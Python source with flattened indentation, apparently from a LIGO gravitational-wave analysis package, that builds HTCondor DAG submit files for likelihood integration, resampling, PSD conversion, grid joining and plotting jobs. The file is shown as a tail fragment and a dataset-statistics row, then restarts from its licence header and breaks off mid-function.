if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_resample_sub(tag='resample', exe=None, file_input=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
Write a submit file for launching a 'resample' job
util_ResampleILEOutputWithExtrinsic.py
"""
exe = exe or which("util_ResampleILEOutputWithExtrinsic.py") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
if not(arg_str is None or len(arg_str)<2):
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_opt('fname',file_input)
ile_job.add_opt('fname-out',file_output)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(file_output)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_cat_sub(tag='cat', exe=None, file_prefix=None,file_postfix=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
Write a submit file for launching a 'resample' job
util_ResampleILEOutputWithExtrinsic.py
"""
exe = exe or which("find") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
exe_switch = which("switcheroo") # tool for patterend search-replace, to fix first line of output file
cmdname = 'catjob.sh'
with open(cmdname,'w') as f:
f.write("#! /bin/bash\n")
f.write(exe+" . -name '"+file_prefix+"*"+file_postfix+"' -exec cat {} \; | sort -r | uniq > "+file_output+";\n")
f.write(exe_switch + " 'm1 ' '# m1 ' "+file_output) # add standard prefix
os.system("chmod a+x "+cmdname)
ile_job = pipeline.CondorDAGJob(universe=universe, executable='catjob.sh')
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# ile_job.add_arg(" . -name '" + file_prefix + "*" +file_postfix+"' -exec cat {} \; ")
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_convertpsd_sub(tag='convert_psd', exe=None, ifo=None,file_input=None,target_dir=None,arg_str='',log_dir=None, universe='local',**kwargs):
"""
Write script to convert PSD from one format to another. Needs to be called once per PSD file being used.
"""
exe = exe or which("convert_psd_ascii2xml") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
ile_job.add_opt("fname-psd-ascii",file_input)
ile_job.add_opt("ifo",ifo)
ile_job.add_arg("--conventional-postfix")
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if not (target_dir is None):
# Copy output PSD into place
ile_job.add_condor_cmd("+PostCmd", '" cp '+ifo+'-psd.xml.gz ' + target_dir +'"')
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_joingrids_sub(tag='join_grids', exe=None, universe='vanilla', input_pattern=None,target_dir=None,output_base=None,log_dir=None,n_explode=1, gzip="/usr/bin/gzip", old_add=True, **kwargs):
"""
Write script to convert PSD from one format to another. Needs to be called once per PSD file being used.
"""
exe = exe or which("ligolw_add") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
# exe_here = "my_join.sh"
# with open(exe_here,'w') as f:
# f.write("#! /bin/bash \n")
# f.write(r"""
# #!/bin/bash
# # Modules and scripts run directly from repository
# # Note the repo and branch are self-referential ! Not a robust solution long-term
# # Exit on failure:
# # set -e
# {} {} > {}/{}.xml
# gzip {}.{}.xml""".format(exe,input_pattern,target_dir,output_base,target_dir,output_base) )
# os.system("chmod a+x "+exe_here)
# exe = exe_here # update executable
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
fname_out =target_dir + "/" +output_base + ".xml.gz"
ile_job.add_arg("--output="+fname_out)
working_dir = log_dir.replace("/logs", '') # assumption about workflow/naming! Danger!
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# ile_job.set_stdout_file(fname_out)
# ile_job.add_condor_cmd("+PostCmd", ' "' + gzip + ' ' +fname_out + '"')
explode_str = ""
for indx in np.arange(n_explode):
explode_str+= " {}/{}-{}.xml.gz ".format(working_dir,output_base,indx)
explode_str += " {}/{}.xml.gz ".format(working_dir,output_base)
ile_job.add_arg(explode_str)
# ile_job.add_arg("overlap-grid*.xml.gz") # working in our current directory
if old_add:
ile_job.add_opt("ilwdchar-compat",'') # needed?
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_subdagILE_sub(tag='subdag_ile', exe=None, universe='vanilla', submit_file=None,input_pattern=None,target_dir=None,output_suffix=None,log_dir=None,sim_xml=None, **kwargs):
"""
Write script to convert PSD from one format to another. Needs to be called once per PSD file being used.
"""
exe = exe or which("create_ile_sub_dag.py")
subfile = submit_file or 'ILE.sub'
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
ile_job.add_arg("--target-dir "+target_dir)
ile_job.add_arg("--output-suffix "+output_suffix)
ile_job.add_arg("--submit-script "+subfile)
ile_job.add_arg("--macroiteration $(macroiteration)")
ile_job.add_arg("--sim-xml "+sim_xml)
working_dir = log_dir.replace("/logs", '') # assumption about workflow/naming! Danger!
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# ile_job.set_stdout_file(fname_out)
# ile_job.add_condor_cmd("+PostCmd", ' "' + gzip + ' ' +fname_out + '"')
ile_job.add_condor_cmd('getenv', 'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
| 40.149694
| 465
| 0.665526
|
# Copyright (C) 2013 Evan Ochsner
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 2 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
A collection of routines to manage Condor workflows (DAGs).
"""
import os, sys
import numpy as np
from time import time
from hashlib import md5
from glue import pipeline
__author__ = "Evan Ochsner <evano@gravity.phys.uwm.edu>, Chris Pankow <pankow@gravity.phys.uwm.edu>"
# Taken from
# http://pythonadventures.wordpress.com/2011/03/13/equivalent-of-the-which-command-in-python/
def is_exe(fpath):
return os.path.exists(fpath) and os.access(fpath, os.X_OK)
def which(program):
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file): return exe_file
return None
def mkdir(dir_name):
try :
os.mkdir(dir_name)
except OSError:
pass
def generate_job_id():
"""
Generate a unique md5 hash for use as a job ID.
Borrowed and modified from the LAL code in glue/glue/pipeline.py
"""
t = str( int( time() * 1000 ) )
r = str( int( np.random.random() * 100000000000000000 ) )
return md5(t + r).hexdigest()
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
def write_integrate_likelihood_extrinsic_grid_sub(tag='integrate', exe=None, log_dir=None, ncopies=1, **kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over
extrinsic parameters.
Like the other case (below), but modified to use the sim_xml
and loop over 'event'
Inputs:
- 'tag' is a string to specify the base name of output files. The output
submit file will be named tag.sub, and the jobs will write their
output to tag-ID.out, tag-ID.err, tag.log, where 'ID' is a unique
identifier for each instance of a job run from the sub file.
- 'cache' is the path to a cache file which gives the location of the
data to be analyzed.
- 'sim' is the path to the XML file with the grid
- 'channelH1/L1/V1' is the channel name to be read for each of the
H1, L1 and V1 detectors.
- 'psdH1/L1/V1' is the path to an XML file specifying the PSD of
each of the H1, L1, V1 detectors.
- 'ncopies' is the number of runs with identical input parameters to
submit per condor 'cluster'
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
assert len(kwargs["psd_file"]) == len(kwargs["channel_name"])
exe = exe or which("integrate_likelihood_extrinsic")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
#
# Macro based options
#
ile_job.add_var_opt("event")
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', '2048')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
# This will automatically release a job that is put on hold for using too much memory with a 50% increased memory request each tim.e
return ile_job, ile_sub_name
# FIXME: Keep in sync with arguments of integrate_likelihood_extrinsic
def write_integrate_likelihood_extrinsic_sub(tag='integrate', exe=None, log_dir=None, ncopies=1, **kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over
extrinsic parameters.
Inputs:
- 'tag' is a string to specify the base name of output files. The output
submit file will be named tag.sub, and the jobs will write their
output to tag-ID.out, tag-ID.err, tag.log, where 'ID' is a unique
identifier for each instance of a job run from the sub file.
- 'cache' is the path to a cache file which gives the location of the
data to be analyzed.
- 'coinc' is the path to a coincident XML file, from which masses and
times will be drawn FIXME: remove this once it's no longer needed.
- 'channelH1/L1/V1' is the channel name to be read for each of the
H1, L1 and V1 detectors.
- 'psdH1/L1/V1' is the path to an XML file specifying the PSD of
each of the H1, L1, V1 detectors.
- 'ncopies' is the number of runs with identical input parameters to
submit per condor 'cluster'
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
assert len(kwargs["psd_file"]) == len(kwargs["channel_name"])
exe = exe or which("integrate_likelihood_extrinsic")
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
#
# Macro based options
#
ile_job.add_var_opt("mass1")
ile_job.add_var_opt("mass2")
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', '2048')
return ile_job, ile_sub_name
def write_result_coalescence_sub(tag='coalesce', exe=None, log_dir=None, output_dir="./", use_default_cache=True):
"""
Write a submit file for launching jobs to coalesce ILE output
"""
exe = exe or which("ligolw_sqlite")
sql_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
sql_sub_name = tag + '.sub'
sql_job.set_sub_file(sql_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
sql_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
sql_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
sql_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if use_default_cache:
sql_job.add_opt("input-cache", "ILE_$(macromassid).cache")
else:
sql_job.add_arg("$(macrofiles)")
#sql_job.add_arg("*$(macromassid)*.xml.gz")
sql_job.add_opt("database", "ILE_$(macromassid).sqlite")
#if os.environ.has_key("TMPDIR"):
#tmpdir = os.environ["TMPDIR"]
#else:
#print >>sys.stderr, "WARNING, TMPDIR environment variable not set. Will default to /tmp/, but this could be dangerous."
#tmpdir = "/tmp/"
tmpdir = "/dev/shm/"
sql_job.add_opt("tmp-space", tmpdir)
sql_job.add_opt("verbose", None)
sql_job.add_condor_cmd('getenv', 'True')
sql_job.add_condor_cmd('request_memory', '1024')
return sql_job, sql_sub_name
def write_posterior_plot_sub(tag='plot_post', exe=None, log_dir=None, output_dir="./"):
"""
Write a submit file for launching jobs to coalesce ILE output
"""
exe = exe or which("plot_like_contours")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("show-points", None)
plot_job.add_opt("dimension1", "mchirp")
plot_job.add_opt("dimension2", "eta")
plot_job.add_opt("input-cache", "ILE_all.cache")
plot_job.add_opt("log-evidence", None)
plot_job.add_condor_cmd('getenv', 'True')
plot_job.add_condor_cmd('request_memory', '1024')
return plot_job, plot_sub_name
def write_tri_plot_sub(tag='plot_tri', injection_file=None, exe=None, log_dir=None, output_dir="./"):
"""
Write a submit file for launching jobs to coalesce ILE output
"""
exe = exe or which("make_triplot")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("output", "ILE_triplot_$(macromassid).png")
if injection_file is not None:
plot_job.add_opt("injection", injection_file)
plot_job.add_arg("ILE_$(macromassid).sqlite")
plot_job.add_condor_cmd('getenv', 'True')
#plot_job.add_condor_cmd('request_memory', '2048')
return plot_job, plot_sub_name
def write_1dpos_plot_sub(tag='1d_post_plot', exe=None, log_dir=None, output_dir="./"):
"""
Write a submit file for launching jobs to coalesce ILE output
"""
exe = exe or which("postprocess_1d_cumulative")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("save-sampler-file", "ILE_$(macromassid).sqlite")
plot_job.add_opt("disable-triplot", None)
plot_job.add_opt("disable-1d-density", None)
plot_job.add_condor_cmd('getenv', 'True')
plot_job.add_condor_cmd('request_memory', '2048')
return plot_job, plot_sub_name
def write_CIP_sub(tag='integrate', exe=None, input_net='all.net',output='output-ILE-samples',universe="vanilla",out_dir=None,log_dir=None, use_eos=False,ncopies=1,arg_str=None,request_memory=8192,arg_vals=None, no_grid=False,**kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over intrinsic parameters.
Inputs:
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
exe = exe or which("util_ConstructIntrinsicPosterior_GenericCoordinates.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_opt("fname", input_net)
ile_job.add_opt("fname-output-samples", out_dir+"/"+output)
ile_job.add_opt("fname-output-integral", out_dir+"/"+output)
#
# Macro based options.
# - select EOS from list (done via macro)
# - pass spectral parameters
#
# ile_job.add_var_opt("event")
if use_eos:
ile_job.add_var_opt("using-eos")
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "fname_output_samples" in kwargs and kwargs["fname_output_samples"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["fname_output_samples"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
if "fname_output_integral" in kwargs and kwargs["fname_output_integral"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["fname_output_integral"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
ile_job.add_condor_cmd("stream_error",'True')
ile_job.add_condor_cmd("stream_output",'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
# This will automatically release a job that is put on hold for using too much memory with a 50% increased memory request each tim.e
return ile_job, ile_sub_name
def write_puff_sub(tag='puffball', exe=None, input_net='output-ILE-samples',output='puffball',universe="vanilla",out_dir=None,log_dir=None, use_eos=False,ncopies=1,arg_str=None,request_memory=1024,arg_vals=None, no_grid=False,**kwargs):
"""
Perform puffball calculation
Inputs:
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
exe = exe or which("util_ParameterPuffball.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_opt("inj-file", input_net)
ile_job.add_opt("inj-file-out", output)
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
except:
print(" LIGO accounting information not available. You must add this manually to integrate.sub !")
return ile_job, ile_sub_name
def write_ILE_sub_simple(tag='integrate', exe=None, log_dir=None, use_eos=False,simple_unique=False,ncopies=1,arg_str=None,request_memory=4096,request_gpu=False,request_disk=False,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,use_simple_osg_requirements=False,singularity_image=None,use_cvmfs_frames=False,frames_dir=None,cache_file=None,fragile_hold=False,max_runtime_minutes=None,condor_commands=None,**kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over intrinsic parameters.
Inputs:
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
if use_singularity and (singularity_image == None) :
print(" FAIL : Need to specify singularity_image to use singularity ")
sys.exit(0)
if use_singularity and (frames_dir == None) and (cache_file == None) :
print(" FAIL : Need to specify frames_dir or cache_file to use singularity (at present) ")
sys.exit(0)
if use_singularity and (transfer_files == None) :
print(" FAIL : Need to specify transfer_files to use singularity at present! (we will append the prescript; you should transfer any PSDs as well as the grid file ")
sys.exit(0)
exe = exe or which("integrate_likelihood_extrinsic")
frames_local = None
if use_singularity:
path_split = exe.split("/")
print((" Executable: name breakdown ", path_split, " from ", exe))
singularity_base_exe_path = "/opt/lscsoft/rift/MonteCarloMarginalizeCode/Code/" # should not hardcode this ...!
if 'SINGULARITY_BASE_EXE_DIR' in list(os.environ.keys()) :
singularity_base_exe_path = os.environ['SINGULARITY_BASE_EXE_DIR']
else:
# singularity_base_exe_path = "/opt/lscsoft/rift/MonteCarloMarginalizeCode/Code/" # should not hardcode this ...!
singularity_base_exe_path = "/usr/bin/" # should not hardcode this ...!
exe=singularity_base_exe_path + path_split[-1]
if not(frames_dir is None):
frames_local = frames_dir.split("/")[-1]
elif use_osg: # NOT using singularity!
if not(frames_dir is None):
frames_local = frames_dir.split("/")[-1]
path_split = exe.split("/")
exe=path_split[-1] # pull out basename
exe_here = 'my_wrapper.sh'
if transfer_files is None:
transfer_files = []
transfer_files += ['../my_wrapper.sh']
with open(exe_here,'w') as f:
